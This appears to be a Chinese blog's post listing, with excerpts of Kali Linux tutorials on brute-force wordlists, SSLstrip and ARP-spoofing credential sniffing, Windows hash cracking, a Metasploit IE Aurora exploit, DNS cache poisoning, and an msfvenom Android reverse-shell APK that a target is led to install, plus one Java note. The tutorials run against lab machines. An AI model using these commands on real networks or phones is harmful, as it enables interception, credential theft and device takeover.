自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(9)
  • 收藏
  • 关注

原创 生成字典的三种方式

字典是记录一些特殊或有目的性的密码集合,通常以txt格式进行记录保存。在渗透许多服务器、smb、ftp、ssh、远程桌面rdp、网页后台等一些用户登录时,没有正确密码,使用密码字典爆破就是最直接的黑客攻击方法一:利用github资源生成1.克隆github资源git clone https://github.com/Mebus/cupp.git2.运行cupplscd cupplspython3 cupp.py -i3.填写个性化信息4.查看生成的字典二:kali自带

2020-10-14 14:41:27 6538 1

原创 HTTPS网页账号密码嗅探

一:SSL原理SSL的作用是为了传输一些敏感信息(比如凭证账号密码)提供安全可靠的保障,确保用户使用浏览器和服务器之间传输的数据是安全可信的当我们访问HTTPS类型的网站,浏览器首先是向服务器发送HTTP层面的请求,并且附带证书验证,在得到双方证书有效后,两者开始SSL安全通信二:实战原理:使用SSLstrip攻击,让我们的kali充当中间人(代理服务器),一边负责和靶机win7之间进行http明文通信,kali能够截获明文数据。另一方面kali进行路由转发,和原本win7要连接的服务器进行正常的h

2020-10-13 21:44:21 1718

原创 嗅探HTTP网页用户账户密码

嗅探HTTP网页一:测试基础1.ARP基础:使用mac地址和ip地址进行通信的局域网协议2.HTTP:一种上网、网页请求通信协议。该协议以明文传输,即在传输时不对数据进行加密,因为http的不安全性,所以在局域网环境中,可以通过ARP欺骗,将目标主机的网络数据包都流经攻击者,然后再通过嗅探的方式从而获取到HTTP的一些数据信息3.Ettercap:一个kali自带的中间人套件二.实战测试1.路由转发,确保目标主机正常上网(截获到的流量发送出去)echo 1 > /proc/sys/ne

2020-10-13 19:53:36 3064 2

原创 windows密码破解(哈希破解技术)

一.windows密码与哈希1.我们用于登录的windows密码,在windows系统中会进行加密。一般密码加密文件储存在c盘的windows\system32\config目录下,文件名是SAM文件。在system目录下有两个非常重要的文件A.SAM文件:储存着windows密码,使用LM或者NT算法加密成明文哈希,再由syskey加密成乱码的二次密文B.SYSTEM文件:密钥文件,有一个程序syskey,对上面的SAM文件进行第一次的解密,解密成明文的哈希值我们使用反编译技术就可以获得密码二.

2020-10-13 14:48:20 5306 2

原创 利用IE浏览器漏洞入侵

目的:利用ie浏览器的aurora漏洞获得目标shell权限实战:1.开启渗透利用框架msfconsole2.搜索这个漏洞(代号 ms10-002)search ms10-0023.使用搜索出的攻击模块use exploit/windows/browser/ms01_002_aurora4.显示要设置的参数show options5.设置参数(kali ip)set SRVHOST 192.168.1.176set SRVPORT 8080set URIPATH

2020-10-13 14:06:52 1233

原创 kali冒充路由器开启ARP局域网欺骗

原理:kali冒充网关,欺骗局域网中任何一台靶机,让这台靶机把所有应该发往网管的数据流量发到kali系统,完成捕获分析实战:1.路由器转发echo 1 > /proc/sys/net/ipv4/ip_forward \提示权限不够时输入 echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward2.欺骗设置(双向欺骗)终端端一:arpspoof -i eth0 -t 192.168.1.129(目标靶机) 192.168.1.1(网关)

2020-10-11 20:55:15 858 2

原创 DNS缓存攻击实现重定向目标网页

目的:通过kali使得目标计算机不管输入什么网址,都进入我们自定义的一个页面一:DNS介绍本次测试之前要把靶机重启(因为本地DNS缓存已经存在)除了ARP缓存攻击,还可欺骗域名服务器(DNS)的缓存条目(从域名到IP地址的映射)我们需要实现当目标访问某些特定网页时,我们把这些流量转发到一个被我们控制的站点ARP:解析协议处理的是IP和MAC地址之间的关系DNS:映射处理的是www.XXX.com之类的域名解析到相应的IP地址上思路:让他人访问www.XXX.com时,本地DNS域名解析服务器

2020-10-11 20:02:39 739

原创 kali控制安卓(拍照、通讯录、GPS等)

1.生成apk(目标手机安装)msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.176 LPORT=8888 R > tst.apk注意:ip地址是kali的,不是目标手机的2.开启kali自带的web服务器sudo service apache2 start3.将apk拷贝到服务器根目录sudo cp tst.apk /var/www/html4.目标手机下载安装txt.apk方法一:目标手机直接在网址

2020-10-06 22:55:08 14243 40

原创 JavaSE学习笔记(九)(异常)

异常异常本身是一个类,产生异常就是创建异常对象并抛出一个异常对象。Throwable是超类java.lang.Throwable:所有错误或者异常的超类两个子类:1.Exception:编译期异常,进行编译(写代码)java程序出现的异常2.RuntimeException:运行期异常,java程序运行时期的异常异常就是小毛病,把异常处理掉,程序可以继续执行Error:错误相当于程序得了一个无法治愈的毛病,必须修改源码编译异常:方法一: public class demo1 {

2020-10-03 14:00:59 119

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除